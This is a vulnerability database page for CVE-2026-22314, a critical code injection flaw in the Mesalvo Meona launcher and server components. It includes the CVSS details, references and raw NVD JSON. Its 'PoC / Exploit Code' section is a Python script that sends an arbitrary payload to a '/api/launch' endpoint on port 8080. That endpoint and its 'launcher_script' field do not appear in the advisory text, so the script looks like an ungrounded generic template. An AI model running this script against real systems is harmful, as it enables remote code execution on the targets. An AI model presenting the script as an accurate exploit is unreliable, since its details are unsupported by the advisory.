CVE-2026-22314

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables code execution on other users' systems. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020.

CVSS Details

CVSS Score

9.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Meona Client Launcher Component <= 19.06.2020 15:11:49

Meona Server Component <= 2025.04 5+323020

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-22314
# This script demonstrates a potential code injection exploit against Mesalvo Meona.
# Note: This is for educational purposes only.

import requests
import sys

def exploit(target_ip, malicious_payload):
    target_url = f"http://{target_ip}:8080/api/launch"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "CVE-2026-22314-Exploit"
    }
    
    # Constructing the malicious payload that exploits the code injection
    data = {
        "config": {
            "launcher_script": f"{malicious_payload}" # Injection point
        }
    }

    try:
        print(f"[*] Sending payload to {target_url}...")
        response = requests.post(target_url, json=data, headers=headers, timeout=5)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully. Check for code execution.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python exploit.py <target_ip> <payload>")
        print("Example: python exploit.py 192.168.1.10 'calc.exe'")
        sys.exit(1)
    
    target = sys.argv[1]
    payload = sys.argv[2]
    exploit(target, payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22314
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22314
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22314/
[4] VulDB https://vuldb.com/cve/CVE-2026-22314
[5] https://seccore.at/blog/cves-meona/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22314", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-20T11:16:26.057", "lastModified": "2026-05-20T14:03:10.193", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables code execution on other users' systems. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://seccore.at/blog/cves-meona/", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}